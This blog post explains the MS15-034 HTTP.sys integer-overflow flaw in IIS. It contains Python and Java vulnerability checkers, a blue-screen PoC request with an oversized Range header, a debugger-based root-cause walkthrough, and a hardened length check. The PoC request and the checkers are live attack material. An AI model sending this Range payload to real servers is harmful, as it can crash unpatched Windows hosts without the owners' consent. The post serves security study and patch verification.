Microsoft IIS HTTP.sys vulnerability (MS15-034): how it works, plus a POC

0. Core part of the MS15-034 POC (based on 巡风 / Xunfeng):

```python
import socket

def check_ms15_034(ip, port, timeout=5):
    """Send a Range request whose end offset is far beyond any real resource
    and look at the reply. An unpatched IIS answers with
    'Requested Range Not Satisfiable'."""
    socket.setdefaulttimeout(timeout)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, int(port)))
    # raw HTTP request: CRLF line endings, blank line terminates the headers
    flag = (b"GET / HTTP/1.0\r\n"
            b"Host: stuff\r\n"
            b"Range: bytes=0-18446744073709551615\r\n"
            b"\r\n")
    s.send(flag)
    data = s.recv(1024).decode("latin-1")
    s.close()
    if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
        print("vuln")
```

Since I have recently wanted to learn Java, I also wrote a Java version of the code:

```java
/*
 * encoding:utf-8
 * Author:chenran01;
 * Email:crsecscu@gmail.com
 */

//import lib packages
import java.net.Socket;
import java.util.Scanner;
import java.io.*;

//define main class
public class HTTPSYS{
    public static String IP_ADDR = "127.0.0.1";
    public static int PORT = 80;
    //Flag is the payload: a raw HTTP request, CRLF line endings, blank line ends the headers
    public static String Flag = "GET / HTTP/1.0\r\n"
                              + "Host: stuff\r\n"
                              + "Range: bytes=0-18446744073709551615\r\n"
                              + "\r\n";
    public static void main(String[] args){
        System.out.print("Please input target IP:");
        Scanner input = new Scanner(System.in);
        IP_ADDR = input.next();
        System.out.print("Please input target port:");
        try{
            //parse the port as a number; System.in.read() would only return one raw byte
            PORT = Integer.parseInt(input.next());
        }catch(Exception ex){
            System.out.printf("Error-Reason:%s, falling back to port 80%n",ex.toString());
            PORT = 80; //fall back only on error (a finally block would override every input)
        }
        try{
            Socket socket = new Socket(IP_ADDR,PORT);
            //create the socket
            BufferedReader socketrecv = new BufferedReader(
                new InputStreamReader(socket.getInputStream(), "ISO-8859-1"));
            OutputStream socketsend = socket.getOutputStream();
            //create the input/output objects
            //write raw bytes: writeUTF() would prepend a 2-byte length, which is not HTTP
            socketsend.write(Flag.getBytes("ISO-8859-1"));//send the payload
            socketsend.flush();
            StringBuilder sb = new StringBuilder();
            String line;
            while((line = socketrecv.readLine()) != null){ //HTTP/1.0: server closes after the reply
                sb.append(line).append('\n');
            }
            String response_content = sb.toString();//collect the response
            if(response_content.indexOf("Server: Microsoft") != -1 && response_content.indexOf("Requested Range Not Satisfiable") != -1){
                System.out.print("Vulnerable");
            }else{
                System.out.print("Not vulnerable");
            }
            socket.close();
        }catch(Exception ex){
            System.out.printf("Error-Reason:%s",ex.toString());
        }
    }
}
```

1. Examining the root cause of the MS15-034 HTTP.sys vulnerability:

The root-cause section is based on: http://www.ijiandao.com/safe/cto/12821.html

```
# Example: blue-screen (BSOD) PoC
"""
GET /welcome.png HTTP/1.1
Host: PoC
Range: bytes=12345-18446744073709551615
"""
```

The Range field here is handled inside IIS by HTTP!UlBuildFastRangeCacheMdlChain (which builds the cached MDL chain for the response, describing the status line, headers and message body of the HTTP response). That function calls nt!IoBuildPartialMdl to build the MDL chain, and inside it the value Length is computed:

Note that it is explicitly required here that the interval determined by VirtualAddress and Length must be a sub-interval of the buffer described by SourceMdl; it is the violation of this requirement that causes the memory corruption in this vulnerability.

The parameters of the third call to nt!IoBuildPartialMdl, the one that builds the message-body MDL, are as follows:

[Figure 6]

```
SourceMdl                = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount      = 0x2d315
SourceMdl.ByteOffset     = 0x0
TargetMdl                = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount      = 0xffffcfc7
TargetMdl.ByteOffset     = 0x39
VirtualAddress           = 0xfffffa801ac97039
Length                   = 0xffffcfc7
```

This Length is computed from the Range field in the HTTP request headers, as follows:

First, HTTP!UlpParseRange parses the Range field, yielding RangeBegin and RangeEnd;
then RangeLength = RangeEnd - RangeBegin + 1 is computed;
finally, RangeLength is truncated to 32 bits to obtain Length.

Taking the PoC's Range: bytes=12345-18446744073709551615 as an example:

```
RangeBegin  = 12345 = 0x3039
RangeEnd    = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff - 0x00003039 + 1 = 0xffffffffffffcfc7
Length      = 0xffffcfc7
```

Clearly, because Length is far too large, the requirement of nt!IoBuildPartialMdl is violated, and memory corruption follows.
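To make the arithmetic above concrete, here is an added example (my own code, not from the original post or from the referenced analysis) that reproduces the RangeLength/Length computation from the Range header, checks the nt!IoBuildPartialMdl sub-range requirement against the MDL values quoted above, and contrasts it with a hardened variant that validates the range against the real resource size before any narrowing to 32 bits. The helper names (parse_range, vulnerable_length, partial_mdl_in_bounds, safe_length) are my own; only the numeric values come from the post, and the treatment of the SourceMdl byte count as the resource's content length is an assumption for the sake of the example.

```python
# Added example: reproduce the MS15-034 Length computation and the violated
# MDL sub-range requirement. Helper names are hypothetical; numbers are the post's.

MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1

def parse_range(header):
    """Parse 'bytes=<begin>-<end>' into two unbounded Python ints
    (mirrors what HTTP!UlpParseRange extracts from the header)."""
    unit, _, spec = header.partition("=")
    if unit.strip() != "bytes" or "-" not in spec:
        raise ValueError("unsupported Range syntax")
    begin, end = spec.split("-", 1)
    return int(begin), int(end)

def vulnerable_length(range_begin, range_end):
    """Unpatched computation: 64-bit RangeEnd - RangeBegin + 1, then the low
    32 bits become Length. Returns (RangeLength, Length)."""
    range_length = (range_end - range_begin + 1) & MASK64
    return range_length, range_length & MASK32

def partial_mdl_in_bounds(src_va, src_byte_count, virtual_address, length):
    """The documented requirement on nt!IoBuildPartialMdl: the interval
    [VirtualAddress, VirtualAddress + Length) must lie inside the SourceMdl buffer."""
    src_end = src_va + src_byte_count
    return src_va <= virtual_address and virtual_address + length <= src_end

def safe_length(range_begin, range_end, content_length):
    """Hardened variant: validate against the real resource size before any
    truncation. Returns None for an unsatisfiable range (caller answers 416);
    an end offset past the resource is clamped to the last byte."""
    if range_begin > range_end or range_begin >= content_length:
        return None
    range_end = min(range_end, content_length - 1)
    return range_end - range_begin + 1

# Values taken from the post's PoC and Figure 6 (SourceMdl.ByteCount is assumed
# here to be the resource's content length)
RANGE_HEADER = "bytes=12345-18446744073709551615"
SOURCE_VA, SOURCE_BYTE_COUNT = 0xfffffa801ac94000, 0x2d315
VIRTUAL_ADDRESS = 0xfffffa801ac97039   # == SOURCE_VA + RangeBegin (0x3039)

if __name__ == "__main__":
    begin, end = parse_range(RANGE_HEADER)
    range_length, length = vulnerable_length(begin, end)
    print(f"RangeLength = {range_length:#x}, Length (32-bit) = {length:#x}")
    print("sub-range requirement holds:",
          partial_mdl_in_bounds(SOURCE_VA, SOURCE_BYTE_COUNT, VIRTUAL_ADDRESS, length))
    print("hardened Length:", safe_length(begin, end, SOURCE_BYTE_COUNT))
```

Running it prints the same 0xffffffffffffcfc7 / 0xffffcfc7 pair as the derivation, shows that VirtualAddress + Length overshoots the end of the SourceMdl buffer by a wide margin, and shows that the hardened version instead clamps the range to the 0x2d315-byte resource, so no oversized Length ever reaches the MDL code.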

Original URL: https://www.cnblogs.com/KevinGeorge/p/8074694.html